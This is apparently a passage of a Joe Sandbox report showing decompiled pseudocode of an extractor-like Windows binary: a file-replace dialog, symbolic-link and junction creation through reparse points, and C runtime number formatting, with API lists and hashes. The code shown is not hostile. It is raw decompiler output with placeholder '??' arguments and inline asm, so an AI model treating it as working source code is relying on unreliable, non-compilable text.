                				if(E003D1316(__edx, _t158, _t159, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
                					_t160 = _t159 - 0x110;
                					if(_t160 == 0) {
                						SetFocus(GetDlgItem(_t158, 0x6c));
                						E003E0602( &_a2640, _a6752, 0x800);
                						E003DC36E( &_a2628,  &_a2628, 0x800);
                						SetDlgItemTextW(_t158, 0x65,  &_a2616);
                						 *0x433074( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
                						SendDlgItemMessageW(_t158, 0x66, 0x170, _a1904, 0);
                						_t149 = FindFirstFileW( &_a2596,  &_a288);
                						if(_t149 != 0xffffffff) {
                							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
                							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
                							_push(0x32);
                							_push( &_a12);
                							_push(0);
                							_push( &_v12);
                							_t162 = 2;
                							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
                							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
                							_push( &_a12);
                							_push( &_a112);
                							E003D4092( &_a900, 0x200, L"%s %s %s", E003DE617(0x99));
                							_t170 = _t168 + 0x18;
                							SetDlgItemTextW(_t158, 0x6a,  &_a900);
                							FindClose(_t149);
                							if((_a308 & 0x00000010) != 0) {
                								_t150 = 0x200;
                							} else {
                								asm("adc eax, ebp");
                								E003EAF0F(0 + _a344, _a340,  &_a212, 0x32);
                								_push(E003DE617(0x98));
                								_t150 = 0x200;
                								E003D4092( &_a884, 0x200, L"%s %s",  &_a192);
                								_t170 = _t170 + 0x14;
                								SetDlgItemTextW(_t158, 0x68,  &_a884);
                							}
                							SendDlgItemMessageW(_t158, 0x67, 0x170, _a1928, 0);
                							_t152 =  *0x418464; // 0x0
                							E003E138A(_t152, _t156,  &_a4);
                							FileTimeToLocalFileTime( &_v0,  &_v24);
                							FileTimeToSystemTime( &_v24,  &_v16);
                							GetTimeFormatW(0x400, _t162,  &_v16, 0,  &_a8, 0x32);
                							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
                							_push( &_a8);
                							_push( &_a108);
                							E003D4092( &_a896, _t150, L"%s %s %s", E003DE617(0x99));
                							_t168 = _t170 + 0x18;
                							SetDlgItemTextW(_t158, 0x6b,  &_a896);
                							_t153 =  *0x42ec8c;
                							_t157 =  *0x42ec88;
                							if((_a304 & 0x00000010) == 0 || (_t157 | _t153) != 0) {
                								E003EAF0F(_t157, _t153,  &_a212, 0x32);
                								_push(E003DE617(0x98));
                								E003D4092( &_a884, _t150, L"%s %s",  &_a192);
                								_t168 = _t168 + 0x14;
                								SetDlgItemTextW(_t158, 0x69,  &_a884);
                							}
                						}
                						L27:
                						_t74 = 0;
                						L28:
                						return _t74;
                					}
                					if(_t160 != 1) {
                						goto L27;
                					}
                					_t165 = 2;
                					_t137 = (_t148 & 0x0000ffff) - _t165;
                					if(_t137 == 0) {
                						L11:
                						_push(6);
                						L12:
                						_pop(_t165);
                						L13:
                						_t138 = SendDlgItemMessageW(_t158, 0x66, 0x171, 0, 0);
                						if(_t138 != 0) {
                							 *0x4330d0(_t138);
                						}
                						EndDialog(_t158, _t165);
                						goto L1;
                					}
                					_t142 = _t137 - 0x6a;
                					if(_t142 == 0) {
                						_t165 = 0;
                						goto L13;
                					}
                					_t143 = _t142 - 1;
                					if(_t143 == 0) {
                						_t165 = 1;
                						goto L13;
                					}
                					_t144 = _t143 - 1;
                					if(_t144 == 0) {
                						_push(4);
                						goto L12;
                					}
                					_t145 = _t144 - 1;
                					if(_t145 == 0) {
                						goto L13;
                					}
                					_t146 = _t145 - 1;
                					if(_t146 == 0) {
                						_push(3);
                						goto L12;
                					}
                					if(_t146 != 1) {
                						goto L27;
                					}
                					goto L11;
                				}
                				L1:
                				_t74 = 1;
                				goto L28;
                			}





























                APIs
                  • Part of subcall function 003D1316: GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                  • Part of subcall function 003D1316: SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 003EC2B1
                • EndDialog.USER32(?,00000006), ref: 003EC2C4
                • GetDlgItem.USER32(?,0000006C), ref: 003EC2E0
                • SetFocus.USER32(00000000), ref: 003EC2E7
                • SetDlgItemTextW.USER32(?,00000065,?), ref: 003EC321
                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 003EC358
                • FindFirstFileW.KERNEL32(?,?), ref: 003EC36E
                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003EC38C
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 003EC39C
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 003EC3B8
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 003EC3D4
                • _swprintf.LIBCMT ref: 003EC404
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                • SetDlgItemTextW.USER32(?,0000006A,?), ref: 003EC417
                • FindClose.KERNEL32(00000000), ref: 003EC41E
                • _swprintf.LIBCMT ref: 003EC477
                • SetDlgItemTextW.USER32(?,00000068,?), ref: 003EC48A
                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 003EC4A7
                • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 003EC4C7
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 003EC4D7
                • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 003EC4F1
                • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 003EC509
                • _swprintf.LIBCMT ref: 003EC535
                • SetDlgItemTextW.USER32(?,0000006B,?), ref: 003EC548
                • _swprintf.LIBCMT ref: 003EC59C
                • SetDlgItemTextW.USER32(?,00000069,?), ref: 003EC5AF
                  • Part of subcall function 003EAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 003EAF35
                  • Part of subcall function 003EAF0F: GetNumberFormatW.KERNEL32 ref: 003EAF84
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                • String ID: %s %s$%s %s %s$P>$REPLACEFILEDLG
                • API String ID: 797121971-4187982892
                • Opcode ID: b6f52ac8af16349cac8da39c300e4754ff120220521a57f386c11e4a4a57f004
                • Instruction ID: c8b1f05e99d8c04f03f338c132842ff7d014a036d98bbd8158d7ba570d67aeaa
                • Opcode Fuzzy Hash: b6f52ac8af16349cac8da39c300e4754ff120220521a57f386c11e4a4a57f004
                • Instruction Fuzzy Hash: 0F91D472148394BBD6229FA1DC49FFF7BACEB4A701F004929B745D60C1D775AA058B22
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E003D6FAA(void* __edx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* _t98;
                				void* _t109;
                				signed int _t112;
                				intOrPtr _t117;
                				signed int _t134;
                				long _t154;
                				void* _t182;
                				void* _t186;
                				void* _t190;
                				void* _t194;
                				short _t195;
                				void* _t199;
                				WCHAR* _t200;
                				long _t201;
                				signed int _t203;
                				signed int _t204;
                				signed int _t205;
                				signed int _t229;
                				intOrPtr* _t233;
                				intOrPtr* _t234;
                				void* _t236;
                				intOrPtr _t237;
                				signed int _t238;
                				void* _t239;
                				intOrPtr _t240;
                				signed int _t242;
                				intOrPtr _t244;
                				short _t245;
                				void* _t246;
                				intOrPtr _t250;
                				short _t252;
                				void* _t253;
                				void* _t255;
                				void* _t256;
                
                				E003EEB78(_t98, _t253);
                				E003EEC50(0x30a8);
                				if( *0x411023 == 0) {
                					E003D7A9C(L"SeRestorePrivilege");
                					E003D7A9C(L"SeCreateSymbolicLinkPrivilege");
                					 *0x411023 = 1;
                				}
                				_t203 = _t253 - 0x2c;
                				E003D13BA(_t203, 0x1418);
                				_t244 =  *((intOrPtr*)(_t253 + 0x10));
                				 *(_t253 - 4) =  *(_t253 - 4) & 0x00000000;
                				E003E0602(_t253 - 0x107c, _t244 + 0x1104, 0x800);
                				 *(_t253 - 0x14) = E003F3E13(_t253 - 0x107c);
                				_t236 = _t253 - 0x107c;
                				_t199 = _t253 - 0x207c;
                				_t109 = E003F6088(_t236, L"\\??\\", 4);
                				_t256 = _t255 + 0x10;
                				_t204 = _t203 & 0xffffff00 | _t109 == 0x00000000;
                				 *(_t253 - 0xd) = _t204;
                				if(_t109 == 0) {
                					_t236 = _t253 - 0x1074;
                				}
                				if(_t204 != 0) {
                					_t194 = E003F6088(_t236, L"UNC\\", 4);
                					_t256 = _t256 + 0xc;
                					if(_t194 == 0) {
                						_t195 = 0x5c;
                						 *((short*)(_t253 - 0x207c)) = _t195;
                						_t199 = _t253 - 0x207a;
                						_t236 = _t236 + 6;
                					}
                				}
                				E003F6066(_t199, _t236);
                				_t112 = E003F3E13(_t253 - 0x207c);
                				_t237 =  *((intOrPtr*)(_t253 + 8));
                				_t200 =  *(_t253 + 0xc);
                				 *(_t253 - 0x18) = _t112;
                				if( *((char*)(_t237 + 0x7197)) != 0) {
                					L11:
                					E003DA0B1(_t200, _t204, _t237, _t253, _t200, 1,  *(_t237 + 0x714b) & 0x000000ff);
                					if(E003DA231(_t200) != 0) {
                						_t186 = E003DA28F(E003DA243(_t200));
                						_push(_t200);
                						if(_t186 == 0) {
                							E003DA1E0();
                						} else {
                							E003DA18F();
                						}
                					}
                					if( *((char*)(_t244 + 0x10f1)) != 0 ||  *((char*)(_t244 + 0x2104)) != 0) {
                						__eflags = CreateDirectoryW(_t200, 0);
                						if(__eflags != 0) {
                							goto L20;
                						}
                						_t201 = 0;
                						E003D2021(__eflags, 0x14, 0, _t200);
                						E003D6D83(0x411098, 9);
                						goto L41;
                					} else {
                						_t182 = CreateFileW(_t200, 0x40000000, 0, 0, 1, 0x80, 0);
                						if(_t182 != 0xffffffff) {
                							CloseHandle(_t182);
                							L20:
                							_t117 =  *((intOrPtr*)(_t244 + 0x1100));
                							__eflags = _t117 - 3;
                							if(_t117 != 3) {
                								__eflags = _t117 - 2;
                								if(_t117 == 2) {
                									L26:
                									_t233 =  *(_t253 - 0x2c);
                									_t205 =  *(_t253 - 0x14) & 0x0000ffff;
                									_t238 =  *(_t253 - 0x18) & 0x0000ffff;
                									 *_t233 = 0xa000000c;
                									_t245 = _t205 + _t205;
                									 *((short*)(_t233 + 0xa)) = _t245;
                									 *((short*)(_t233 + 4)) = 0x10 + (_t238 + _t205) * 2;
                									 *((intOrPtr*)(_t233 + 6)) = 0;
                									E003F6066(_t233 + 0x14, _t253 - 0x107c);
                									_t246 =  *(_t253 - 0x2c);
                									 *((short*)(_t246 + 0xc)) = _t245 + 2;
                									 *((short*)(_t246 + 0xe)) = _t238 + _t238;
                									E003F6066(_t246 + ( *(_t253 - 0x14) + 0xb) * 2, _t253 - 0x207c);
                									_t134 =  *(_t253 - 0xd) & 0x000000ff ^ 0x00000001;
                									__eflags = _t134;
                									 *(_t246 + 0x10) = _t134;
                									L27:
                									_t239 = CreateFileW(_t200, 0xc0000000, 0, 0, 3, 0x2200000, 0);
                									__eflags = _t239 - 0xffffffff;
                									if(_t239 != 0xffffffff) {
                										__eflags = DeviceIoControl(_t239, 0x900a4, _t246, ( *(_t246 + 4) & 0x0000ffff) + 8, 0, 0, _t253 - 0x30, 0);
                										if(__eflags != 0) {
                											E003D9556(_t253 - 0x30b4);
                											 *(_t253 - 4) = 1;
                											E003D7A7B(_t253 - 0x30b4, _t239);
                											_t240 =  *((intOrPtr*)(_t253 + 8));
                											_t247 =  *((intOrPtr*)(_t253 + 0x10));
                											asm("sbb ecx, ecx");
                											asm("sbb ecx, ecx");
                											asm("sbb ecx, ecx");
                											E003D9DA2(_t253 - 0x30b4,  *((intOrPtr*)(_t253 + 0x10)),  ~( *(_t240 + 0x82d0)) &  *((intOrPtr*)(_t253 + 0x10)) + 0x00001040,  ~( *(_t240 + 0x82d4)) & _t247 + 0x00001048,  ~( *(_t240 + 0x82d8)) & _t247 + 0x00001050);
                											E003D9620(_t253 - 0x30b4);
                											__eflags =  *((char*)(_t240 + 0x71a8));
                											if( *((char*)(_t240 + 0x71a8)) == 0) {
                												E003DA4ED(_t200,  *((intOrPtr*)(_t247 + 0x24)));
                											}
                											_t201 = 1;
                											E003D959A(_t253 - 0x30b4);
                											L41:
                											E003D15FB(_t253 - 0x2c);
                											 *[fs:0x0] =  *((intOrPtr*)(_t253 - 0xc));
                											return _t201;
                										}
                										CloseHandle(_t239);
                										E003D2021(__eflags, 0x15, 0, _t200);
                										_t154 = GetLastError();
                										__eflags = _t154 - 5;
                										if(_t154 == 5) {
                											L32:
                											__eflags = E003E07BC();
                											if(__eflags == 0) {
                												E003D15C6(_t253 - 0x7c, 0x18);
                												E003E15FE(_t253 - 0x7c);
                											}
                											L34:
                											E003D6DCB(0x411098, __eflags);
                											E003D6D83(0x411098, 9);
                											_t250 =  *((intOrPtr*)(_t253 + 0x10));
                											_push(_t200);
                											__eflags =  *((char*)(_t250 + 0x10f1));
                											if( *((char*)(_t250 + 0x10f1)) == 0) {
                												DeleteFileW();
                											} else {
                												RemoveDirectoryW();
                											}
                											L37:
                											_t201 = 0;
                											goto L41;
                										}
                										__eflags = _t154 - 0x522;
                										if(__eflags != 0) {
                											goto L34;
                										}
                										goto L32;
                									}
                									E003D6C23(_t200);
                									E003D6D83(0x411098, 9);
                									goto L37;
                								}
                								__eflags = _t117 - 1;
                								if(_t117 != 1) {
                									goto L37;
                								}
                								goto L26;
                							}
                							_t234 =  *(_t253 - 0x2c);
                							_t229 =  *(_t253 - 0x14) & 0x0000ffff;
                							_t242 =  *(_t253 - 0x18) & 0x0000ffff;
                							 *_t234 = 0xa0000003;
                							_t252 = _t229 + _t229;
                							 *((short*)(_t234 + 0xa)) = _t252;
                							 *((short*)(_t234 + 4)) = 0xc + (_t242 + _t229) * 2;
                							 *((intOrPtr*)(_t234 + 6)) = 0;
                							E003F6066(_t234 + 0x10, _t253 - 0x107c);
                							_t246 =  *(_t253 - 0x2c);
                							 *((short*)(_t246 + 0xc)) = _t252 + 2;
                							 *((short*)(_t246 + 0xe)) = _t242 + _t242;
                							E003F6066(_t246 + ( *(_t253 - 0x14) + 9) * 2, _t253 - 0x207c);
                							goto L27;
                						}
                						E003D6C23(_t200);
                						goto L37;
                					}
                				}
                				if( *(_t253 - 0xd) != 0) {
                					goto L37;
                				}
                				_t190 = E003DBCC3(_t244 + 0x1104);
                				_t269 = _t190;
                				if(_t190 != 0) {
                					goto L37;
                				}
                				_push(_t244 + 0x1104);
                				_push(_t200);
                				_push(_t244 + 0x28);
                				_push(_t237);
                				if(E003D7861(_t269) == 0) {
                					goto L37;
                				}
                				goto L11;
                			}









































                APIs
                • __EH_prolog.LIBCMT ref: 003D6FAA
                • _wcslen.LIBCMT ref: 003D7013
                • _wcslen.LIBCMT ref: 003D7084
                  • Part of subcall function 003D7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 003D7AAB
                  • Part of subcall function 003D7A9C: GetLastError.KERNEL32 ref: 003D7AF1
                  • Part of subcall function 003D7A9C: CloseHandle.KERNEL32(?), ref: 003D7B00
                  • Part of subcall function 003DA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,003D977F,?,?,003D95CF,?,?,?,?,?,00402641,000000FF), ref: 003DA1F1
                  • Part of subcall function 003DA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,003D977F,?,?,003D95CF,?,?,?,?,?,00402641), ref: 003DA21F
                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 003D7139
                • CloseHandle.KERNEL32(00000000), ref: 003D7155
                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 003D7298
                  • Part of subcall function 003D9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,003D73BC,?,?,?,00000000), ref: 003D9DBC
                  • Part of subcall function 003D9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 003D9E70
                  • Part of subcall function 003D9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,003D95D6,?,?,?,?,?,00402641,000000FF), ref: 003D963B
                  • Part of subcall function 003DA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,003DA325,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA501
                  • Part of subcall function 003DA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,003DA325,?,?,?,003DA175,?,00000001,00000000,?,?), ref: 003DA532
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                • API String ID: 2821348736-3508440684
                • Opcode ID: 1346c4c41e7d97692c6777e519c3662e1628617f7cfccd1bea0b15c76254b84f
                • Instruction ID: 6aa07290f440979722411f01844f6ff097784e9cadb6bacf0723e4ab5d75536f
                • Opcode Fuzzy Hash: 1346c4c41e7d97692c6777e519c3662e1628617f7cfccd1bea0b15c76254b84f
                • Instruction Fuzzy Hash: 8FC1EA76904645AADB22DF74ED42FEEB7ACAF04300F00455BFA56E7381E734AA44CB61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E003FD8EE(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr* _a16, signed int _a20, intOrPtr _a24) {
                				signed int _v8;
                				signed int _v32;
                				signed int _v36;
                				char _v460;
                				signed int _v464;
                				void _v468;
                				signed int _v472;
                				signed int _v932;
                				signed int _v936;
                				signed int _v1392;
                				signed int _v1396;
                				signed int _v1400;
                				char _v1860;
                				signed int _v1864;
                				signed int _v1865;
                				signed int _v1872;
                				signed int _v1876;
                				signed int _v1880;
                				signed int _v1884;
                				signed int _v1888;
                				signed int _v1892;
                				signed int _v1896;
                				intOrPtr _v1900;
                				signed int _v1904;
                				signed int _v1908;
                				signed int _v1912;
                				signed int _v1916;
                				signed int _v1920;
                				signed int _v1924;
                				signed int _v1928;
                				char _v1936;
                				char _v1944;
                				char _v2404;
                				signed int _v2408;
                				signed int _t743;
                				signed int _t753;
                				signed int _t754;
                				intOrPtr _t763;
                				signed int _t764;
                				intOrPtr _t767;
                				intOrPtr _t770;
                				intOrPtr _t772;
                				intOrPtr _t773;
                				void* _t774;
                				signed int _t777;
                				signed int _t778;
                				signed int _t784;
                				void* _t789;
                				signed int _t790;
                				intOrPtr _t792;
                				void* _t793;
                				signed int _t794;
                				signed int _t795;
                				signed int _t796;
                				signed int _t805;
                				signed int _t810;
                				signed int _t811;
                				signed int _t812;
                				signed int _t815;
                				signed int _t816;
                				signed int _t817;
                				signed int _t819;
                				signed int _t820;
                				signed int _t825;
                				signed int _t826;
                				signed int _t832;
                				signed int _t833;
                				signed int _t836;
                				signed int _t841;
                				signed int _t849;
                				signed int* _t852;
                				signed int _t856;
                				signed int _t867;
                				signed int _t868;
                				signed int _t870;
                				char* _t871;
                				signed int _t874;
                				signed int _t878;
                				signed int _t879;
                				signed int _t884;
                				signed int _t886;
                				signed int _t891;
                				signed int _t900;
                				signed int _t903;
                				signed int _t905;
                				signed int _t908;
                				signed int _t909;
                				signed int _t910;
                				signed int _t913;
                				signed int _t926;
                				signed int _t927;
                				signed int _t929;
                				char* _t930;
                				signed int _t933;
                				signed int _t937;
                				signed int _t938;
                				signed int* _t940;
                				signed int _t943;
                				signed int _t945;
                				signed int _t950;
                				signed int _t958;
                				signed int _t961;
                				signed int _t965;
                				signed int* _t972;
                				intOrPtr _t974;
                				void* _t975;
                				intOrPtr* _t977;
                				signed int* _t981;
                				unsigned int _t992;
                				signed int _t993;
                				void* _t996;
                				signed int _t997;
                				void* _t999;
                				signed int _t1000;
                				signed int _t1001;
                				signed int _t1002;
                				signed int _t1012;
                				signed int _t1017;
                				signed int _t1020;
                				unsigned int _t1023;
                				signed int _t1024;
                				void* _t1027;
                				signed int _t1028;
                				void* _t1030;
                				signed int _t1031;
                				signed int _t1032;
                				signed int _t1033;
                				signed int _t1038;
                				signed int* _t1043;
                				signed int _t1045;
                				signed int _t1055;
                				void* _t1056;
                				void _t1058;
                				signed int _t1061;
                				void* _t1064;
                				void* _t1071;
                				signed int _t1077;
                				signed int _t1078;
                				void* _t1080;
                				signed int _t1081;
                				signed int _t1082;
                				signed int _t1084;
                				signed int _t1085;
                				signed int _t1086;
                				signed int _t1090;
                				signed int _t1094;
                				signed int _t1095;
                				signed int _t1096;
                				signed int _t1098;
                				signed int _t1099;
                				signed int _t1100;
                				signed int _t1101;
                				signed int _t1102;
                				signed int _t1103;
                				signed int _t1105;
                				signed int _t1106;
                				signed int _t1107;
                				signed int _t1108;
                				signed int _t1109;
                				signed int _t1110;
                				unsigned int _t1111;
                				void* _t1114;
                				intOrPtr _t1116;
                				signed int _t1117;
                				signed int _t1118;
                				signed int _t1119;
                				signed int* _t1123;
                				void* _t1127;
                				void* _t1128;
                				signed int _t1129;
                				signed int _t1130;
                				signed int _t1131;
                				signed int _t1134;
                				signed int _t1135;
                				signed int _t1140;
                				signed int _t1142;
                				signed int _t1143;
                				signed int _t1151;
                				signed int _t1152;
                				signed int _t1153;
                				signed int _t1154;
                				signed int _t1155;
                				signed int _t1156;
                				signed int _t1157;
                				signed int _t1161;
                				signed int _t1162;
                				signed int _t1163;
                				signed int _t1164;
                				signed int _t1165;
                				unsigned int _t1168;
                				void* _t1172;
                				void* _t1173;
                				unsigned int _t1174;
                				signed int _t1179;
                				signed int _t1180;
                				signed int _t1182;
                				signed int _t1183;
                				intOrPtr* _t1185;
                				signed int _t1186;
                				void* _t1187;
                				signed int _t1188;
                				signed int _t1189;
                				signed int _t1192;
                				signed int _t1194;
                				signed int _t1195;
                				void* _t1196;
                				signed int _t1197;
                				signed int _t1198;
                				signed int _t1199;
                				void* _t1202;
                				signed int _t1203;
                				signed int _t1204;
                				signed int _t1205;
                				signed int _t1206;
                				signed int _t1207;
                				signed int* _t1210;
                				signed int _t1211;
                				signed int _t1212;
                				signed int _t1213;
                				signed int _t1214;
                				intOrPtr* _t1216;
                				intOrPtr* _t1217;
                				signed int _t1219;
                				signed int _t1221;
                				signed int _t1224;
                				signed int _t1230;
                				signed int _t1234;
                				signed int _t1235;
                				void* _t1236;
                				signed int _t1240;
                				signed int _t1243;
                				signed int _t1244;
                				signed int _t1245;
                				signed int _t1246;
                				signed int _t1247;
                				signed int _t1248;
                				signed int _t1250;
                				signed int _t1251;
                				signed int _t1252;
                				signed int _t1253;
                				signed int _t1255;
                				signed int _t1256;
                				signed int _t1257;
                				signed int _t1258;
                				signed int _t1259;
                				signed int _t1261;
                				signed int _t1262;
                				signed int _t1264;
                				signed int _t1266;
                				signed int _t1268;
                				signed int _t1271;
                				signed int _t1273;
                				signed int* _t1274;
                				signed int* _t1277;
                				signed int _t1286;
                
                				_t1142 = __edx;
                				_t1271 = _t1273;
                				_t1274 = _t1273 - 0x964;
                				_t743 =  *0x40e7ac; // 0xc24f6281
                				_v8 = _t743 ^ _t1271;
                				_push(__ebx);
                				_t1055 = _a20;
                				_push(__esi);
                				_push(__edi);
                				_t1185 = _a16;
                				_v1924 = _t1185;
                				_v1920 = _t1055;
                				E003FD416( &_v1944, __eflags);
                				_t1234 = _a8;
                				_t748 = 0x2d;
                				if((_t1234 & 0x80000000) == 0) {
                					_t748 = 0x120;
                				}
                				 *_t1185 = _t748;
                				 *((intOrPtr*)(_t1185 + 8)) = _t1055;
                				_t1186 = _a4;
                				if((_t1234 & 0x7ff00000) != 0) {
                					L5:
                					_t753 = E003F9994( &_a4);
                					_pop(_t1070);
                					__eflags = _t753;
                					if(_t753 != 0) {
                						_t1070 = _v1924;
                						 *((intOrPtr*)(_v1924 + 4)) = 1;
                					}
                					_t754 = _t753 - 1;
                					__eflags = _t754;
                					if(_t754 == 0) {
                						_push("1#INF");
                						goto L308;
                					} else {
                						_t777 = _t754 - 1;
                						__eflags = _t777;
                						if(_t777 == 0) {
                							_push("1#QNAN");
                							goto L308;
                						} else {
                							_t778 = _t777 - 1;
                							__eflags = _t778;
                							if(_t778 == 0) {
                								_push("1#SNAN");
                								goto L308;
                							} else {
                								__eflags = _t778 == 1;
                								if(_t778 == 1) {
                									_push("1#IND");
                									goto L308;
                								} else {
                									_v1928 = _v1928 & 0x00000000;
                									_a4 = _t1186;
                									_a8 = _t1234 & 0x7fffffff;
                									_t1286 = _a4;
                									asm("fst qword [ebp-0x768]");
                									_t1188 = _v1896;
                									_v1916 = _a12 + 1;
                									_t1077 = _t1188 >> 0x14;
                									_t784 = _t1077 & 0x000007ff;
                									__eflags = _t784;
                									if(_t784 != 0) {
                										_t1143 = 0;
                										_t784 = 0;
                										__eflags = 0;
                									} else {
                										_t1143 = 1;
                									}
                									_t1189 = _t1188 & 0x000fffff;
                									_t1058 = _v1900 + _t784;
                									asm("adc edi, esi");
                									__eflags = _t1143;
                									_t1078 = _t1077 & 0x000007ff;
                									_t1240 = _t1078 - 0x434 + (0 | _t1143 != 0x00000000) + 1;
                									_v1872 = _t1240;
                									E003FF460(_t1078, _t1286);
                									_push(_t1078);
                									 *_t1274 = _t1286;
                									_t789 = E003FF570();
                									_t1080 = _t1078;
                									_t790 = L004023A0(_t789, _t1058, _t1080, _t1143);
                									_v1904 = _t790;
                									__eflags = _t790 - 0x7fffffff;
                									if(_t790 == 0x7fffffff) {
                										L16:
                										__eflags = 0;
                										_v1904 = 0;
                									} else {
                										__eflags = _t790 - 0x80000000;
                										if(_t790 == 0x80000000) {
                											goto L16;
                										}
                									}
                									_v468 = _t1058;
                									__eflags = _t1189;
                									_v464 = _t1189;
                									_t1061 = (0 | _t1189 != 0x00000000) + 1;
                									_v472 = _t1061;
                									__eflags = _t1240;
                									if(_t1240 < 0) {
                										__eflags = _t1240 - 0xfffffc02;
                										if(_t1240 == 0xfffffc02) {
                											L101:
                											_t792 =  *((intOrPtr*)(_t1271 + _t1061 * 4 - 0x1d4));
                											_t195 =  &_v1896;
                											 *_t195 = _v1896 & 0x00000000;
                											__eflags =  *_t195;
                											asm("bsr eax, eax");
                											if( *_t195 == 0) {
                												_t1081 = 0;
                												__eflags = 0;
                											} else {
                												_t1081 = _t792 + 1;
                											}
                											_t793 = 0x20;
                											_t794 = _t793 - _t1081;
                											__eflags = _t794 - 1;
                											_t795 = _t794 & 0xffffff00 | _t794 - 0x00000001 > 0x00000000;
                											__eflags = _t1061 - 0x73;
                											_v1865 = _t795;
                											_t1082 = _t1081 & 0xffffff00 | _t1061 - 0x00000073 > 0x00000000;
                											__eflags = _t1061 - 0x73;
                											if(_t1061 != 0x73) {
                												L107:
                												_t796 = 0;
                												__eflags = 0;
                											} else {
                												__eflags = _t795;
                												if(_t795 == 0) {
                													goto L107;
                												} else {
                													_t796 = 1;
                												}
                											}
                											__eflags = _t1082;
                											if(_t1082 != 0) {
                												L126:
                												_v1400 = _v1400 & 0x00000000;
                												_t224 =  &_v472;
                												 *_t224 = _v472 & 0x00000000;
                												__eflags =  *_t224;
                												E003FBDE1( &_v468, 0x1cc,  &_v1396, 0);
                												_t1274 =  &(_t1274[4]);
                											} else {
                												__eflags = _t796;
                												if(_t796 != 0) {
                													goto L126;
                												} else {
                													_t1109 = 0x72;
                													__eflags = _t1061 - _t1109;
                													if(_t1061 < _t1109) {
                														_t1109 = _t1061;
                													}
                													__eflags = _t1109 - 0xffffffff;
                													if(_t1109 != 0xffffffff) {
                														_t1258 = _t1109;
                														_t1216 =  &_v468 + _t1109 * 4;
                														_v1880 = _t1216;
                														while(1) {
                															__eflags = _t1258 - _t1061;
                															if(_t1258 >= _t1061) {
                																_t208 =  &_v1876;
                																 *_t208 = _v1876 & 0x00000000;
                																__eflags =  *_t208;
                															} else {
                																_v1876 =  *_t1216;
                															}
